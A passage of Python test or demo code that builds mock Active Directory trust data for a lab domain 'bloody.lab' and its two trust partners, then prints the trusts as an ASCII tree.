                },
                "cousin.corp": {
                    "distinguishedName": "CN=cousin.corp,CN=System,DC=bloody,DC=lab",
                    "trustDirection": [b"3"],
                    "trustPartner": [b"cousin.corp"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"0"],
                },
                "stranger.lab": {
                    "distinguishedName": "CN=stranger.lab,CN=System,DC=bloody,DC=lab",
                    "trustDirection": [b"3"],
                    "trustPartner": [b"stranger.lab"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"8"],
                },
            },
        }
        trust_root_domain = "bloody.lab"
        tree = {}
        asciitree.branchFactory({":" + trust_root_domain: tree}, [], trust_dict)
        tree_printer = asciitree.LeftAligned()
        print(tree_printer({trust_root_domain: tree}))
